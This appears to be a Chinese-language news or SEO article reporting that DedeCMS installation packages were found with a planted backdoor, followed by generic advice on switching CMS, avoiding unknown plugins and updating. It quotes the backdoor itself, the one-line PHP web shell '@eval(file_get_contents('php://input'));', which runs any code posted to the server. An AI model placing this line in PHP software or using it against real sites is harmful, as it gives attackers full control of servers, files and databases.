jtbc网站内容管理系统(php开源网站管理系统织梦安装包被发现植入后门获取控制权限)

　　jtbc网站内容管理系统(php开源网站管理系统织梦安装包被发现植入后门获取控制权限)

　　最新消息，瑞星和360今日发布警告称，知名php开源网站管理系统织梦cms（Dedecms）安装包被发现被植入后门。黑客可以通过该后门直接获取网站的控制权，获取存储在服务器上的文件和数据库。

　　根据第三方权威统计数据，目前约有50万网站使用此dedecms系统搭建，涉及企业、政府机构、媒体机构、行业和个人网站等.

　　安全界分析人士发现，此类文件被植入了后门代码“@eval(file_get_contents('php://input'));”。黑客只需要构建一个简单的数据包并提交到服务器即可。网站的WebShell，通过对服务器的进一步渗透攻击，进而获得服务器的最高权限，直接访问服务器上的文件、数据库等信息。

　　下面小熊优化编辑给出相关建议：

　　1、尽快转换系统，可以使用pageadmin、东易、wp等不断更新的cms系统，以及一些国内老品牌cms包括dedecms@ >、phpcms、jtbc等已经停止更新，建议不要使用。

　　2、尽量不要从网上下载未知的插件，尤其是那些使用wp的网站。大部分被黑都是因为在网上乱用插件造成的。

　　3、 保持系统更新。官方更新版本应及时更新。不要觉得在使用该功能时不会更新该功能。有时更新不仅是功能更新，还有安全更新。